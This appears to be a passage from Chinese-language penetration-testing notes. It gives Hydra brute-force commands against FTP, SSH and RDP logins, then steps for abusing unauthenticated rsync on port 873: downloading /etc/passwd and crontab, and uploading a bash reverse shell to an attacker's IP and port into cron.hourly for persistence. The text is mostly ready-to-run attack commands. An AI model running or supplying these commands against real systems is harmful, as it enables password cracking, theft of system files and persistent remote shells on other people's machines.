hydra -L test -P 10top1K.txt <ip地址> ftp -V
hydra -l root -P 10top1K.txt <ip地址> ssh -V
hydra -l administrator -P 10top1K.txt <ip地址> rdp -V
密码项目:fuzzDicts
Rsync:linux文件同步的应用程序,常用于本地计算机和远程计算机之间文件同步,端口873。
rsync rsync:///
出现上述信息,说明存在rsync未授权访问。
rsync rsync:///src/
rsync rsync:///src/passwd ./
rsync -av passwd rsync:///src/tmp/passwd
rsync rsync:///src/etc/crontab /root/cron.txt
(下载到本地查看)touch shell //创建文件
//文件内容
/bin/bash -i >& /dev/tcp/<攻击机ip:port> 0>&1
chmod +x shell //修改文件权限
rsync -av shell rsync:///src/etc/cron.hourly
(上传到可利用的计划任务中)fofa爬虫:fofa_viewer
Proftpd:用于架设ftp服务。